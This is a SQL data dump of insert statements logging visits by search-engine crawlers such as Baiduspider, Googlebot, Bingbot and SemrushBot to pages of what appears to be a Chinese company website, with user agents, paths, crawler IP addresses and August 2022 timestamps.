INSERT INTO `ey_weapp_spider_visit` VALUES ('95104', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/109.html', '116.179.32.240', '1660625713', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95164', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/9_13.html', '116.179.32.206', '1660650448', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94927', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/105.html', '216.244.66.194', '1660541428', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94924', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/174.html', '220.181.108.174', '1660539506', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95077', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/100.html', '216.244.66.194', '1660612182', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95106', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/420.html', '185.191.171.3', '1660625801', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95114', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/list_3_7/', '114.119.151.155', '1660628218', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94850', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/131.html', '185.191.171.15', '1660503363', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94848', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/list_3_47/', '66.249.79.110', '1660502165', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94851', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/103.html', '216.244.66.194', '1660503526', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94835', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/contact', '114.119.151.153', '1660491306', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94873', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/9_8.html', '185.191.171.20', '1660513904', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94877', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/products/306.html', '185.191.171.20', '1660515945', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94876', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/', '118.184.177.52', '1660515562', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94830', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/bengche/', '114.119.151.153', '1660488929', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94831', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/262.html', '114.119.151.153', '1660490190', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94817', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/202.html', '116.179.32.172', '1660483608', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94815', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/212.html', '114.119.151.153', '1660482231', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94816', '2', 'mozilla/5.0 (linux;u;android 4.2.2;zh-cn;) applewebkit/534.46 (khtml,like gecko) version/5.1 mobile safari/10600.6.3 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/288.html', '116.179.32.206', '1660483608', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94820', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/210.html', '220.181.108.156', '1660483613', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94823', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/lds.html', '114.119.151.155', '1660484840', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94786', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/203.html', '66.249.79.108', '1660472416', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94766', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/list_3_5/', '114.119.151.155', '1660460898', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94763', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/454.html', '116.179.32.212', '1660459064', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94765', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/4_2.html', '220.181.108.80', '1660460700', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94768', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/', '123.125.109.40', '1660462886', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94780', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/bljxw/list_18_17/', '220.181.108.101', '1660468885', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94771', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/bljxw/list_18_36/', '185.191.171.13', '1660464070', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94779', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/list_3_47/', '185.191.171.38', '1660467762', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94777', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/products/331.html', '185.191.171.25', '1660467461', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94778', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/', '118.184.177.117', '1660467475', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94758', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/31_5.html', '185.191.171.15', '1660455527', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94759', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/102.html', '114.119.151.155', '1660456327', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94757', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/215.html', '114.119.151.153', '1660455221', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94782', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/89.html', '185.191.171.11', '1660471217', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94756', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/480.html', '185.191.171.45', '1660454973', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94829', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/', '66.249.79.112', '1660488469', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94795', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/421.html', '216.244.66.194', '1660475392', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94796', '2', 'mozilla/5.0 (linux;u;android 4.2.2;zh-cn;) applewebkit/534.46 (khtml,like gecko) version/5.1 mobile safari/10600.6.3 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/106.html', '220.181.108.175', '1660475426', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94792', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/344.html', '66.249.79.110', '1660473907', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94840', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/102.html', '185.191.171.21', '1660496625', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94842', '6', 'mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '/news/425.html', '157.55.39.41', '1660497812', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95102', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/hangyexinwen/list_18_23/', '66.249.79.112', '1660625056', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95122', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/9_21.html', '116.179.32.36', '1660630720', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94787', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/106.html', '216.244.66.194', '1660472722', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95146', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/', '36.234.107.122', '1660641990', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94785', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/175.html', '116.179.32.201', '1660472153', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94784', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/213.html', '185.191.171.35', '1660472047', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94755', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/439.html', '114.119.151.153', '1660454832', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94762', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/products/81.html', '116.179.32.163', '1660459062', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94754', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/220.html', '220.181.108.145', '1660454153', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94751', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/352.html', '185.191.171.25', '1660450393', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94752', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/list_3_26/', '185.191.171.3', '1660450945', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94748', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/case/64.html', '185.191.171.43', '1660449088', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94789', '6', 'mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '/news/300.html', '40.77.167.13', '1660472761', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94753', '6', 'mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '/', '157.55.39.41', '1660453959', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94750', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/243.html', '66.249.79.112', '1660450364', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94747', '6', 'mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '/bljwd/', '40.77.167.13', '1660448772', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94790', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/list_3_27/', '216.244.66.194', '1660472844', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94788', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/list_3_5/', '216.244.66.194', '1660472745', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94806', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/', '123.125.109.40', '1660479102', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94744', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/5_3.html', '185.191.171.38', '1660446770', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94745', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/82.html', '66.249.79.112', '1660447136', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94801', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/8_3.html', '185.191.171.44', '1660476804', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94791', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/products/279.html', '185.191.171.14', '1660473861', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94735', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/155.html', '185.191.171.44', '1660438153', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94732', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/290.html', '66.249.79.110', '1660436920', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94734', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/case/239.html', '114.119.151.155', '1660438081', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94733', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/402.html', '114.119.151.153', '1660437506', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94743', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/', '61.135.159.203', '1660445384', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94730', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/1_21.html', '185.191.171.10', '1660435580', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94737', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/9_39.html', '185.191.171.9', '1660438912', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94731', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/chezaibengal/', '114.119.151.155', '1660436037', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94725', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/chukouquanqiu/', '66.249.79.108', '1660433386', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94726', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/yangquan.html', '114.119.151.153', '1660434241', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94716', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/list_3_52/', '114.119.151.153', '1660428996', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94724', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/290.html', '66.249.79.108', '1660433320', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94712', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/list_3_7', '114.119.151.155', '1660427800', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94740', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/bljxw/list_18_17/', '220.181.108.110', '1660439428', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94738', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/102.html', '216.244.66.194', '1660439336', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94736', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/215.html', '216.244.66.194', '1660438200', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94713', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/360.html', '185.191.171.39', '1660427970', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94739', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/91.html', '216.244.66.194', '1660439343', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94709', '99', 'mozilla/5.0 (macintosh; intel mac os x 10_15_5) applewebkit/605.1.15 (khtml, like gecko) version/13.1.1 safari/605.1.15 (applebot/0.1; +http://www.apple.com/go/applebot)', '/news/342.html', '17.121.115.40', '1660427021', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94714', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/143.html', '185.191.171.24', '1660428301', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94715', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/203.html', '66.249.79.110', '1660428437', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94710', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/sds.html', '114.119.151.155', '1660427513', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94711', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/list_3_40/', '114.119.151.155', '1660427662', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94793', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/465.html', '185.191.171.40', '1660474041', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94728', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/', '58.250.125.174', '1660434389', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94717', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/', '61.135.159.169', '1660429264', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94707', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/list_3_22/', '185.191.171.35', '1660424302', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94708', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/', '66.249.79.110', '1660425933', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94721', '6', 'mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '/gqal/', '207.46.13.179', '1660431347', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94706', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/104.html', '185.191.171.33', '1660422930', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94800', '2', 'mozilla/5.0 (compatible; baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)', '/', '110.82.126.229', '1660476652', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94718', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/223.html', '185.191.171.39', '1660430338', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94719', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/fxs.html', '114.119.151.153', '1660430780', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94698', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/81.html', '66.249.79.108', '1660418524', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94701', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/54.html', '220.181.108.169', '1660419485', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94705', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/9_42.html', '220.181.108.91', '1660422563', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95080', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/290.html', '66.249.79.108', '1660613003', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95082', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/115.html', '185.191.171.19', '1660615227', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94804', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/245.html', '114.119.151.155', '1660478053', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94700', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/214.html', '185.191.171.41', '1660419368', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94696', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/421.html', '185.191.171.26', '1660417867', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94703', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/list_3_2/', '114.119.151.155', '1660422101', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95081', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/9_5.html', '116.179.32.234', '1660614013', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94692', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/63.html', '116.179.32.147', '1660416048', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94699', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/', '66.249.79.108', '1660418694', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94691', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/list_3_35/', '216.244.66.194', '1660415683', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94694', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/98.html', '114.119.151.153', '1660417274', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94695', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/202.html', '220.181.108.167', '1660417275', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94688', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/193.html', '185.191.171.44', '1660414440', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94720', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/252.html', '66.249.79.108', '1660431084', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94686', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/157.html', '116.179.32.95', '1660413594', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94727', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/294.html', '185.191.171.33', '1660434272', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94681', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/bljwd/', '116.179.32.79', '1660407048', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94729', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/gqal/', '114.119.151.155', '1660435424', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94673', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/201.html', '116.179.32.68', '1660403777', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94668', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/224.html', '114.119.151.153', '1660402675', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94666', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/228.html', '114.119.151.155', '1660402532', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94659', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/280.html', '114.119.151.155', '1660400778', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94658', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/products/70.html', '114.119.151.153', '1660400521', '0');
